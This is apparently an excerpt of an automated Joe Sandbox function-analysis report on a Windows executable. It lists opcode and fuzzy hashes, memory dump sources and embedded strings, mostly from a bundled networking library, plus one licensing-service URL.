                                        • String ID: Expire Date: %s$ Public Key Algorithm: %s$Expire Date$Public Key Algorithm
                                        • API String ID: 1294909896-2901970132
                                        • Opcode ID: d1af9e19bfd3234d3eeaf2121e00c9d2f5c8de4f447ef79f15fbd6379bd1cdda
                                        • Instruction ID: 0e28b88f16485fd0077ceafdb20ed8c0a9c682558face8a8f25ae942f648ed6c
                                        • Opcode Fuzzy Hash: d1af9e19bfd3234d3eeaf2121e00c9d2f5c8de4f447ef79f15fbd6379bd1cdda
                                        • Instruction Fuzzy Hash: 0A41B661B0878289EB90CB6294441FA3BA1FF05B9CF684935DE4D9B79ADFBCE144C300
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdupstrchr$mallocstrncpy
                                        • String ID:
                                        • API String ID: 2121287944-0
                                        • Opcode ID: 162cfc5e3b2bd834d5d2ba64906c2f71fabde8023f2c2bfa0597903e57dcd4e8
                                        • Instruction ID: a09ebd665386645e5d52179ccf56a319aad21a546d1b9cd0d1b3f63365b52a36
                                        • Opcode Fuzzy Hash: 162cfc5e3b2bd834d5d2ba64906c2f71fabde8023f2c2bfa0597903e57dcd4e8
                                        • Instruction Fuzzy Hash: 4331CC31E0974646EB95DF12A9403767B90FF49B98F644635DE5D83792DFBCE0808300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: memcpy$freemalloc
                                        • String ID: PLAIN
                                        • API String ID: 3313557100-4000620671
                                        • Opcode ID: 7aa8b1226e8794902b3a7c6f13b299fd038e878eeaebd1f4d39a8c2478d064d5
                                        • Instruction ID: fe05f6fd027cccd97a5aac7872617d7aaf7d9d5b1a1287679aa215fc150ca22f
                                        • Opcode Fuzzy Hash: 7aa8b1226e8794902b3a7c6f13b299fd038e878eeaebd1f4d39a8c2478d064d5
                                        • Instruction Fuzzy Hash: 2931A366A08B8182EB50CF56E4503AA6B90FF45BE8F548631DF9D877E6EE7CD045C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Serial Number: %s$ Signature Algorithm: %s$Serial Number$Signature Algorithm
                                        • API String ID: 1294909896-517259162
                                        • Opcode ID: 49062338fa728a480f03ffc8c73f599868ed05a6081dec6f2208dcaaeaa7c8b2
                                        • Instruction ID: 70cb5880e4b013a8ededbd991486709ff2785f0fea2eda251bb8ab5dabbcb9d2
                                        • Opcode Fuzzy Hash: 49062338fa728a480f03ffc8c73f599868ed05a6081dec6f2208dcaaeaa7c8b2
                                        • Instruction Fuzzy Hash: 94419365B0878248EB948B6294441FA6F61BF05B8CF684836DE4E9779BDFBCE145C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: callocfreememcpystrchr
                                        • String ID: CAPA$Got unexpected pop3-server response
                                        • API String ID: 2887963327-1591402739
                                        • Opcode ID: 8f7bb6eff1932f0ffaac0f1d66c4d701fe0cc7ba242ca57fc2f904d82a641f28
                                        • Instruction ID: ad143822e13ada826bea28327ca3ad879cf52b597eae11f97f1b70bf286f4a42
                                        • Opcode Fuzzy Hash: 8f7bb6eff1932f0ffaac0f1d66c4d701fe0cc7ba242ca57fc2f904d82a641f28
                                        • Instruction Fuzzy Hash: F5318B72B0D78292EF598B2690442B96A90FF05798F640136CB1EA7392EFFCE4658301
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$malloc
                                        • String ID: Signature: %s$%s%lx$Signature
                                        • API String ID: 2190258309-1406629954
                                        • Opcode ID: 8f7e6674a1c1ba69b688cbb497cb26438ce796b53516a398fe8ab6d44bb0a6f9
                                        • Instruction ID: 4eb5aae5f902e6f2bc435a85f89a393de1482f85b29f058b0305030e2651e0bb
                                        • Opcode Fuzzy Hash: 8f7e6674a1c1ba69b688cbb497cb26438ce796b53516a398fe8ab6d44bb0a6f9
                                        • Instruction Fuzzy Hash: 44318562B086828AEFE08B26E4546BE6B61FF45B8CF640432DE4D97756EE6DE045C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Serial Number: %s$ Signature Algorithm: %s$Serial Number$Signature Algorithm
                                        • API String ID: 1294909896-517259162
                                        • Opcode ID: 3d01aac320b6837197919b4d404cc678e73ef002af64dabce31c7302412ab6f4
                                        • Instruction ID: d43444c3f40c762d4940e3a251387d964ecb84b6ddc981bab8c42e160a1622c7
                                        • Opcode Fuzzy Hash: 3d01aac320b6837197919b4d404cc678e73ef002af64dabce31c7302412ab6f4
                                        • Instruction Fuzzy Hash: ED31A891E4978244EFD49B6294441FA2F61BF05B8CF640835EE4E9B75BEEBCE144C300
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdupcallocfree
                                        • String ID:
                                        • API String ID: 1236595397-0
                                        • Opcode ID: b39798a8aef06ed82c566a2d88ee447f92a66763dc49ba57baf9da5a54a9cb28
                                        • Instruction ID: 70a7be939783c56d69c39cd597f81116b74a65a11917ac451d0fefecad1a2030
                                        • Opcode Fuzzy Hash: b39798a8aef06ed82c566a2d88ee447f92a66763dc49ba57baf9da5a54a9cb28
                                        • Instruction Fuzzy Hash: 61318272A08B8682EF51CB25E0503B96BA0FF85B8DF284431DE4C877A6EF7DD5958710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: freemalloc
                                        • String ID: Serial Number: %s$ Signature Algorithm: %s$Serial Number$Signature Algorithm
                                        • API String ID: 3061335427-517259162
                                        • Opcode ID: 632438d9ac447024213cf64137fedb5f060d340c63d455fcb278728206f4af24
                                        • Instruction ID: 0c0952699825c17c4bd86181e7fa4747ece67212975e4c4810e90212fa67f010
                                        • Opcode Fuzzy Hash: 632438d9ac447024213cf64137fedb5f060d340c63d455fcb278728206f4af24
                                        • Instruction Fuzzy Hash: DB3184A1E4978248EB908B6294441FA2F61BF05B8CF640835EE4E9B75BEFBCE144C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: freemalloc
                                        • String ID: Serial Number: %s$ Signature Algorithm: %s$Serial Number$Signature Algorithm
                                        • API String ID: 3061335427-517259162
                                        • Opcode ID: 9677d2b0a011c57c10e4aa2445b7a7815ea8b8af1046fe33e2643f36df8bb4f2
                                        • Instruction ID: 74d8d3891400fcc715c4678ce8753db4b3328ef2ae2f123bfaf119646bcf4296
                                        • Opcode Fuzzy Hash: 9677d2b0a011c57c10e4aa2445b7a7815ea8b8af1046fe33e2643f36df8bb4f2
                                        • Instruction Fuzzy Hash: 42318491E4978248EB909B6294441FA2FA1BF05B8CF640835EE4E9B75BEFBCE144C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: freemalloc
                                        • String ID: OS/400$SITE NAMEFMT 1
                                        • API String ID: 3061335427-2049154998
                                        • Opcode ID: 4a9e05dfc51966e101f837aa05a72b838e2f85a4623016fdb596f5f70d8ea46e
                                        • Instruction ID: a2700845e12c8971cc46acd29eda0a51c15bd1bd5fe228e7a045ba06b78ecdef
                                        • Opcode Fuzzy Hash: 4a9e05dfc51966e101f837aa05a72b838e2f85a4623016fdb596f5f70d8ea46e
                                        • Instruction Fuzzy Hash: 5D31AE31A0D68381EBB18B26A4503B92B64BF5979CF604031CE8DD7786EEBCE586C310
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: CriticalSectionfree$CloseEnterHandleLeaveclosesocket
                                        • String ID:
                                        • API String ID: 469868127-0
                                        • Opcode ID: 5f3c904f0ae646e7217e9643221857d26f1b1b0a293a541f282175a39cabd730
                                        • Instruction ID: eb44de97f8dc9cbfeec33af03e969a2b638aea2f9027281ad4fdd68e0cecac62
                                        • Opcode Fuzzy Hash: 5f3c904f0ae646e7217e9643221857d26f1b1b0a293a541f282175a39cabd730
                                        • Instruction Fuzzy Hash: 8E21FC36608A4186E7219F53E6942697B70FF49B98F244131CF8E83B55DFB9E4A5C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _errno_strdup
                                        • String ID: %s cookie %s="%s" for domain %s, path %s, expire %I64d$Added$FALSE$Replaced
                                        • API String ID: 2151398962-2292467869
                                        • Opcode ID: ae6b8994ec19ad4053c8a5285d89d30fd32302a12d5452887c14cdd28c29dbee
                                        • Instruction ID: 36554339ea50d1b44e757cd029cd00ea40b78602172a57802d952d67adabfa00
                                        • Opcode Fuzzy Hash: ae6b8994ec19ad4053c8a5285d89d30fd32302a12d5452887c14cdd28c29dbee
                                        • Instruction Fuzzy Hash: 49615021A1878645FFB68B17D6443B96FA4AF4575CF284036DB8D82693DFACF884CB10
                                        APIs
                                          • Part of subcall function 00007FF6029A4320: memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF6029A1B59), ref: 00007FF6029A4351
                                          • Part of subcall function 00007FF6029A3C40: memcpy.VCRUNTIME140 ref: 00007FF6029A3C93
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A26F2
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2740
                                        • __std_exception_copy.VCRUNTIME140 ref: 00007FF6029A2790
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A27DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy$__std_exception_copy
                                        • String ID: out_of_range
                                        • API String ID: 2484256320-3053435996
                                        • Opcode ID: 4910cf63ee3357ecd4b6187b3e6a3d560b349bb99ce6059dd4b311dc1bc49d05
                                        • Instruction ID: bb6b7bacf9f86d69c0ac09212b9d4468baa889bd4aa8e1b3a8ee23f52ebe3b41
                                        • Opcode Fuzzy Hash: 4910cf63ee3357ecd4b6187b3e6a3d560b349bb99ce6059dd4b311dc1bc49d05
                                        • Instruction Fuzzy Hash: C1519B32E18B4299FB00CB65E8943AC3761EF447ACF504235EA6C43ADADFB8E195C300
                                        APIs
                                        • memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF6029A1B59), ref: 00007FF6029A4351
                                        • memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF6029A1B59), ref: 00007FF6029A4416
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF6029A1B59), ref: 00007FF6029A446A
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6029A4471
                                          • Part of subcall function 00007FF6029FFB18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-3333333333333333,00007FF6029A43FE,7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF6029A1B59), ref: 00007FF6029FFB32
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID: https://keyauth.win/api/1.2/
                                        • API String ID: 1155477157-3933380396
                                        • Opcode ID: e5d09450d75d7d0d2a987c36b25d823e2b26b5c7a33540b2d8d186e69df48b6a
                                        • Instruction ID: aba113859f1c3e284826b74ff9971f8dfa995157b0abd620fd9f96d3f6afd9e6
                                        • Opcode Fuzzy Hash: e5d09450d75d7d0d2a987c36b25d823e2b26b5c7a33540b2d8d186e69df48b6a
                                        • Instruction Fuzzy Hash: 92310322F0978548EF18DB16A6542781A819F41FFCF680630DE2D4BBD6DEFCE4828384
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: tolower$_time64
                                        • String ID: :%u$Hostname in DNS cache was stale, zapped
                                        • API String ID: 4068448496-2924501231
                                        • Opcode ID: 78cbedec7f8cce32c60e4a6791c285383e5d29da9d607bd30dc434ffb4fa044e
                                        • Instruction ID: 17af3fd2220b71f081921ba7bc3714d22a5215015a81deaeaef2348aafa8727b
                                        • Opcode Fuzzy Hash: 78cbedec7f8cce32c60e4a6791c285383e5d29da9d607bd30dc434ffb4fa044e
                                        • Instruction Fuzzy Hash: D441B222A1CA8291EB60DB12E4407B96B65EF44F9CF744632DE8E87B96DF7CE005C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$_close_openmalloc
                                        • String ID: Couldn't open file %s
                                        • API String ID: 3412525164-447283422
                                        • Opcode ID: 0074623fa6ff74a2ece1bd6b24346a1457ce3b464ab42e5d9aa92a68c6f9fb29
                                        • Instruction ID: 7a74736eb37c874a9e7d654835e1814b595d42bcabb183d0d59f50f8632e413a
                                        • Opcode Fuzzy Hash: 0074623fa6ff74a2ece1bd6b24346a1457ce3b464ab42e5d9aa92a68c6f9fb29
                                        • Instruction Fuzzy Hash: B941A432A0878581EB648F66E4042BDAFA1FF45B98F245131DE9D87795EFBCE441C701
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_errnofreememcpyrecv
                                        • String ID: Recv failure: %s
                                        • API String ID: 267823591-4276829032
                                        • Opcode ID: c0b2c462bbfc6f6cf3140b48251a684da05401aabcc64ed099c3ee0977bb49c1
                                        • Instruction ID: f4eb06fb565d1032f65fc436f0c60828da521bb9e077151ffda8ca39afefb47d
                                        • Opcode Fuzzy Hash: c0b2c462bbfc6f6cf3140b48251a684da05401aabcc64ed099c3ee0977bb49c1
                                        • Instruction Fuzzy Hash: 4B31BD76B05B4181EB509F12E9942AA2B64BB88FDCF204931DE1D87785DEBCD466C740
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdupfreestrpbrk
                                        • String ID: RCPT TO:<%s>$RCPT TO:<%s@%s>
                                        • API String ID: 1812939018-579818044
                                        • Opcode ID: dbaaae04e0c0637cee1d8c578a156e15624b493c6880e1ad6b2898319cc183af
                                        • Instruction ID: 322bd73561c46476fa990f6dd4b767ccf327df9620c75be86cb4b564d40e5021
                                        • Opcode Fuzzy Hash: dbaaae04e0c0637cee1d8c578a156e15624b493c6880e1ad6b2898319cc183af
                                        • Instruction Fuzzy Hash: C4319966A18B8581EB01CB26E4403B9ABA1FF85B98F684231EA5D437D6DFBCD541C300
                                        APIs
                                        Strings
                                        Memory Dump Source
